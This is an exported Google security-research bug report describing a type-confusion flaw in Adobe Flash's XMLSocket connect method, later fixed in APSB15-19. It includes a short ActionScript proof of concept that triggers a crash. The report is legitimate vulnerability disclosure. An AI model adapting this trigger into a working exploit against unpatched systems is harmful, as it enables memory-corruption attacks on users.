superuser5 / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: XMLSocket Destructor Does Not Get Cleared Before Setting User Data in connect (Part 2) #416

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
This issue is a variant of issue 192, which the fix did not address.

If XMLSocket connect is called on an object that already has a destroy function 
set, such as a BitmapData object, the method will set the user data of that 
object, but not clear the destroy function. This leads to type confusion when 
the user data is freed during garbage collection.

A PoC is as follows:

class subsocket extends flash.display.BitmapData{

    public function subsocket(){

    var n = {valueOf : func};
    this.valueOf = func;
    var x = new XMLSocket();

    x.connect.call(this, "127.0.0.1", this);

}

function func(){

    if(this){
        }
    this.__proto__ = {}; 
    this.__proto__.__constructor__ = flash.display.BitmapData;
    super(10, 10, true, 10);
    return 80;
    }

}

A SWF and fla are attached. Note that this PoC needs to be run on a webserver 
on localhost (or change the IP in the PoC to the server value), and it only 
crashes in Chrome on 64-bit Linux.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 29 May 2015 at 10:31

Attachments:

GoogleCodeExporter commented 9 years ago
This is PSIRT-3766

Original comment by natashe...@google.com on 1 Jun 2015 at 8:57

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:27

GoogleCodeExporter commented 9 years ago
Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html

Original comment by natashe...@google.com on 18 Aug 2015 at 7:41